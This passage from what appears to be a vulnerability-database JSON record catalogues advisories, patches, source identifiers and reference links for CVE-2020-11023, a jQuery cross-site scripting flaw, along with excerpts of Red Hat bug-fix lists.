comparator\n2134291 - CVE-2022-40152 woodstox-core: woodstox to serialise XML data was vulnerable to Denial of Service attacks\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n2135770 - CVE-2022-40150 jettison: memory exhaustion via user-supplied XML or JSON data\n2135771 - CVE-2022-40149 jettison: parser crash by stackoverflow\n2145194 - CVE-2022-45047 mina-sshd: Java unsafe deserialization vulnerability\n2155682 - CVE-2022-46364 Apache CXF: SSRF Vulnerability\n2155970 - CVE-2022-45693 jettison: If the value in map is the map\u0027s self, the new new JSONObject(map) cause StackOverflowError which may lead to dos\n\n6. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001\nJBEAP-23865 - [GSS](7.4.z) Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001\nJBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001\nJBEAP-23928 - Tracker bug for the EAP 7.4.9 release for RHEL-9\nJBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001\nJBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001\nJBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001\nJBEAP-24100 - [GSS](7.4.z) Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001\nJBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value\nJBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001\nJBEAP-24132 - [GSS](7.4.z) Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001\nJBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001\nJBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002\nJBEAP-24191 - [GSS](7.4.z) Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001\nJBEAP-24195 - [GSS](7.4.z) Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001\nJBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003\nJBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2\nJBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001\nJBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001\n\n7. Solution:\n\nFor OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster\n- -cli.html. Description:\n\nRed Hat OpenShift Service Mesh is Red Hat\u0027s distribution of the Istio\nservice mesh project, tailored for installation into an on-premise\nOpenShift Container Platform installation. Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1850004 - CVE-2020-11023 jQuery: passing HTML containing \u003coption\u003e elements to manipulation methods could result in untrusted code execution\n1850034 - CVE-2020-12666 macaron: open redirect in the static handler\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11023"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "VULMON",
"id": "CVE-2020-11023"
},
{
"db": "PACKETSTORM",
"id": "164887"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170823"
},
{
"db": "PACKETSTORM",
"id": "159727"
},
{
"db": "PACKETSTORM",
"id": "158797"
}
],
"trust": 2.34
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-11023",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "162160",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-02",
"trust": 1.2
},
{
"db": "TENABLE",
"id": "TNS-2021-10",
"trust": 1.2
},
{
"db": "ICS CERT",
"id": "ICSA-22-055-02",
"trust": 0.9
},
{
"db": "ICS CERT",
"id": "ICSA-22-097-01",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-21-306-01",
"trust": 0.8
},
{
"db": "ICS CERT",
"id": "ICSA-25-203-05",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94847990",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99891704",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU94912830",
"trust": 0.8
},
{
"db": "JVN",
"id": "JVNVU99394498",
"trust": 0.8
},
{
"db": "CERT@VDE",
"id": "VDE-2021-027",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "170823",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171212",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "158797",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "170819",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "164887",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "171213",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "162651",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171214",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159852",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160274",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170821",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159275",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161727",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "161830",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168304",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "160548",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "170817",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158750",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159513",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158555",
"trust": 0.1
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2420",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163560",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-11023",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "159727",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "VULMON",
"id": "CVE-2020-11023"
},
{
"db": "PACKETSTORM",
"id": "164887"
},
{
"db": "PACKETSTORM",
"id": "171212"
},
{
"db": "PACKETSTORM",
"id": "170819"
},
{
"db": "PACKETSTORM",
"id": "170823"
},
{
"db": "PACKETSTORM",
"id": "159727"
},
{
"db": "PACKETSTORM",
"id": "158797"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"id": "VAR-202004-2199",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T22:15:25.604000Z",
"patch": {
"_id": null,
"data": [
{
"title": "hitachi-sec-2020-130 Software product security information",
"trust": 0.8,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/"
},
{
"title": "Red Hat: Moderate: python-XStatic-jQuery224 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205412 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat AMQ Interconnect 1.9.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204211 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Virtualization security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203807 - Security Advisory"
},
{
"title": "Debian Security Advisories: DSA-4693-1 drupal7 -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=978f239ce60a8a08c53eb64ba189d0f6"
},
{
"title": "Red Hat: Moderate: security update - Red Hat Ansible Tower 3.7.4-1 - RHEL7 Container",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205249 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203369 - Security Advisory"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1626",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2021-1626"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226393 - Security Advisory"
},
{
"title": "Debian CVElist Bug Report Logs: wordpress: WordPress 5.9.2 security and maintenance release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=e7014c0a68e8d9bc31a54125059176dc"
},
{
"title": "Red Hat: Important: RHV Manager (ovirt-engine) 4.4 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203247 - Security Advisory"
},
{
"title": "Tenable Security Advisories: [R1] Nessus Network Monitor 5.13.0 Fixes One Third-party Vulnerability",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-02"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.4.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202813 - Security Advisory"
},
{
"title": "Red Hat: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204847 - Security Advisory"
},
{
"title": "HP: HPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=HPSBPI03688"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=0c6e8f969487f201b1d56f59bd98f443"
},
{
"title": "HP: SUPPORT COMMUNICATION- SECURITY BULLETIN\nHPSBPI03688 rev. 1 - Certain HP Printer and MFP products - Cross-Site Scripting (XSS)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hp_bulletin\u0026qid=e57a04f097f54c762da82263eadc1b8a"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230556 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat JBoss Enterprise Application Platform 7.4.9 Security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230554 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231043 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231044 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231049 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Single Sign-On 7.6.2 security update on RHEL 9",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20231045 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: IBM QRadar SIEM is vulnerable to using components with known vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=22fc4d0a2671b6a2b6b740928ccb3e85"
},
{
"title": "Tenable Security Advisories: [R1] LCE 6.0.9 Fixes Multiple Third-party Vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=TNS-2021-10"
},
{
"title": "IBM: Security Bulletin: IBM License Key Server Administration and Reporting Tool is impacted by multiple vulnerabilities in jQuery, Bootstrap and AngularJS",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=06c81cfb59e5c7353b49e490f4b9142c"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2020-130"
},
{
"title": "IBM: Security Bulletin: Security vulnerabilities have been fixed in IBM Security Identity Manager Virtual Appliance",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=8c22e5a481443cacfeb30c0ca6b1c6be"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.1 image security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204298 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerability issues affect IBM Spectrum Conductor 2.5.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=0bf006d622ea4a9435b282864e760566"
},
{
"title": "IBM: Security Bulletin: QRadar Pulse application add on to IBM QRadar SIEM is vulnerable to using components with known vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=1abb4a91c60a38765126584f92f9afd0"
},
{
"title": "IBM: Security Bulletin: QRadar Pulse application add on to IBM QRadar SIEM is vulnerable to using components with known vulnerabilities",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=157eb1e30eb92554b7b6df9a1809e974"
},
{
"title": "IBM: Security Bulletin: Multiple vulnerability issues affect IBM Spectrum Symphony 7.3.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=c47c09015d1429df4a71453000607351"
},
{
"title": "CVE-2020-11023 POC Dom XSS",
"trust": 0.1,
"url": "https://github.com/Cybernegro/CVE-2020-11023 "
},
{
"title": "Hacky-Holidays-2020-Writeups",
"trust": 0.1,
"url": "https://github.com/goelp14/Hacky-Holidays-2020-Writeups "
},
{
"title": "https-nj.gov---CVE-2020-11023\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/korestreet/https-nj.gov---CVE-2020-11023 "
},
{
"title": "https-nj.gov---CVE-2020-11023\nRECOMMENDATION\nREFERENCES",
"trust": 0.1,
"url": "https://github.com/Snorlyd/https-nj.gov---CVE-2020-11023 "
},
{
"title": "CVE Sandbox :: jQuery",
"trust": 0.1,
"url": "https://github.com/cve-sandbox/jquery "
},
{
"title": "JS_Encoder",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/JS_Encoder "
},
{
"title": "CVE-2020-11022 CVE-2020-11023",
"trust": 0.1,
"url": "https://github.com/0xAJ2K/CVE-2020-11022-CVE-2020-11023 "
},
{
"title": "https://github.com/DanielRuf/snyk-js-jquery-565129",
"trust": 0.1,
"url": "https://github.com/DanielRuf/snyk-js-jquery-565129 "
},
{
"title": "100DaysofLearning Daily Checklist - \u2705",
"trust": 0.1,
"url": "https://github.com/arijitdirghanji/100DaysofLearning "
},
{
"title": "XSSPlayground\nWhat is XSS?",
"trust": 0.1,
"url": "https://github.com/AssassinUKG/XSSPlayground "
},
{
"title": "jQuery XSS",
"trust": 0.1,
"url": "https://github.com/EmptyHeart5292/jQuery-XSS "
},
{
"title": "Strings_Attached\nUser Experience\nDevelopment Process\nTesting\nBugs\nLibraries and Programs Used\nDeployment\nCredits\nAcknowledgements",
"trust": 0.1,
"url": "https://github.com/johnrearden/strings_attached "
},
{
"title": "jQuery \u2014 New Wave JavaScript",
"trust": 0.1,
"url": "https://github.com/spurreiter/jquery "
},
{
"title": "Case Study",
"trust": 0.1,
"url": "https://github.com/faizhaffizudin/Case-Study-Hamsa "
},
{
"title": "Retire HTML Parser",
"trust": 0.1,
"url": "https://github.com/marksowell/retire-html-parser "
},
{
"title": "https://github.com/octane23/CASE-STUDY-1",
"trust": 0.1,
"url": "https://github.com/octane23/CASE-STUDY-1 "
},
{
"title": "Vulnerability",
"trust": 0.1,
"url": "https://github.com/tzwlhack/Vulnerability "
},
{
"title": "\u6b22\u8fce\u5173\u6ce8\u963f\u5c14\u6cd5\u5b9e\u9a8c\u5ba4\u5fae\u4fe1\u516c\u4f17\u53f7",
"trust": 0.1,
"url": "https://github.com/alphaSeclab/sec-daily-2020 "
},
{
"title": "SecBooks\nSecBooks\u76ee\u5f55",
"trust": 0.1,
"url": "https://github.com/SexyBeast233/SecBooks "
},
{
"title": "PoC in GitHub",
"trust": 0.1,
"url": "https://github.com/soosmile/POC "
},
{
"title": "Github CVE Monitor",
"trust": 0.1,
"url": "https://github.com/khulnasoft-lab/awesome-security "
},
{
"title": "Github CVE Monitor",
"trust": 0.1,
"url": "https://github.com/khulnasoft-labs/awesome-security "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-11023"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-79",
"trust": 1.1
},
{
"problemtype": "Cross-site scripting (CWE-79) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163560"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005056"
},
{
"db": "NVD",
"id": "CVE-2020-11023"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.3,
"url": "https://www.debian.org/security/2020/dsa-4693"
},
{
"trust": 1.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11023"
},
{
"trust": 1.2,
"url": "https://github.com/jquery/jquery/security/advisories/ghsa-jpcq-cgw6-v4j6"
},
{
"trust": 1.2,
"url": "https://security.netapp.com/advisory/ntap-20200511-0006/"
},
{
"trust": 1.2,
"url": "https://www.drupal.org/sa-core-2020-002"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-02"
},
{
"trust": 1.2,
"url": "https://www.tenable.com/security/tns-2021-10"
},
{
"trust": 1.2,
"url": "https://security.gentoo.org/glsa/202007-03"
},
{
"trust": 1.2,
"url": "http://packetstormsecurity.com/files/162160/jquery-1.0.3-cross-site-scripting.html"
},
{
"trust": 1.2,
"url": "https://blog.jquery.com/2020/04/10/jquery-3-5-0-released"
},
{
"trust": 1.2,
"url": "https://jquery.com/upgrade-guide/3.5/"
},
{
"trust": 1.2,
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.2,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.2,
"url": "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00067.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-07/msg00085.html"
},
{
"trust": 1.2,
"url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00039.html"
},
{
"trust": 1.1,
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/qpn2l2xvqgua2v5hnqjwhk3apsk3vn7k/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r094f435595582f6b5b24b66fedf80543aa8b1d57a3688fbcc21f06ec%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rf661a90a15da8da5922ba6127b3f5f8194d4ebec8855d60a0dd13248%40%3cdev.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r9c5fda81e4bca8daee305b4c03283dddb383ab8428a151d4cb0b3b15%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ra3c9219fcb0b289e18e9ec5a5ebeaa5c17d6b79a201667675af6721c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/radcb2aa874a79647789f3563fcbbceaf1045a029ee8806b59812a8ea%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rd38b4185a797b324c8dd940d9213cf99fcdc2dbf1fc5a63ba7dee8c9%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r6e97b37963926f6059ecc1e417721608723a807a76af41d4e9dbed49%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rb69b7d8217c1a6a2100247a5d06ce610836b31e3f5d73fc113ded8e7%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r4aadb98086ca72ed75391f54167522d91489a0d0ae25b12baa8fc7c5%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ra374bb0299b4aa3e04edde01ebc03ed6f90cf614dad40dd428ce8f72%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rb25c3bc7418ae75cba07988dafe1b6912f76a9dd7d94757878320d61%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rf1ba79e564fe7efc56aef7c986106f1cf67a3427d08e997e088e7a93%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ra32c7103ded9041c7c1cb8c12c8d125a6b2f3f3270e2937ef8417fac%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sfp4uk4egp4afh2mwyj5a5z4i7xvfq6b/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/avkyxlwclzbv2n7m46kyk4lva5oxwpby/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ra406b3adfcffcb5ce8707013bdb7c35e3ffc2776a8a99022f15274c6%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rab82dd040f302018c85bd07d33f5604113573514895ada523c3401d9%40%3ccommits.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r6c4df3b33e625a44471009a172dabe6865faec8d8f21cac2303463b1%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r1fed19c860a0d470f2a3eded12795772c8651ff583ef951ddac4918c%40%3cgitbox.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r0593393ca1e97b1e7e098fe69d414d6bd0a467148e9138d07e86ebbb%40%3cissues.hive.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/sapqvx3xdnpgft26qaq6ajixzzbz4cd4/"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rda99599896c3667f2cc9e9d34c7b6ef5d2bbed1f4801e1d75a2b0679%40%3ccommits.nifi.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3cdev.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r2c85121a47442036c7f8353a3724aa04f8ecdfda1819d311ba4f5330%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r4dba67be3239b34861f1b9cfdf9dfb3a90272585dcce374112ed6e16%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r3702ede0ff83a29ba3eb418f6f11c473d6e3736baba981a8dbd9c9ef%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r07ab379471fb15644bf7a92e4a98cbc7df3cf4e736abae0cc7625fe6%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r9e0bd31b7da9e7403478d22652b8760c946861f8ebd7bd750844898e%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rf0f8939596081d84be1ae6a91d6248b96a02d8388898c372ac807817%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r9006ad2abf81d02a0ef2126bab5177987e59095b7194a487c4ea247c%40%3ccommits.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r55f5e066cc7301e3630ce90bbbf8d28c82212ae1f2d4871012141494%40%3cdev.felix.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.1,
"url": "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3cissues.flink.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2020-11023"
},
{
"trust": 1.0,
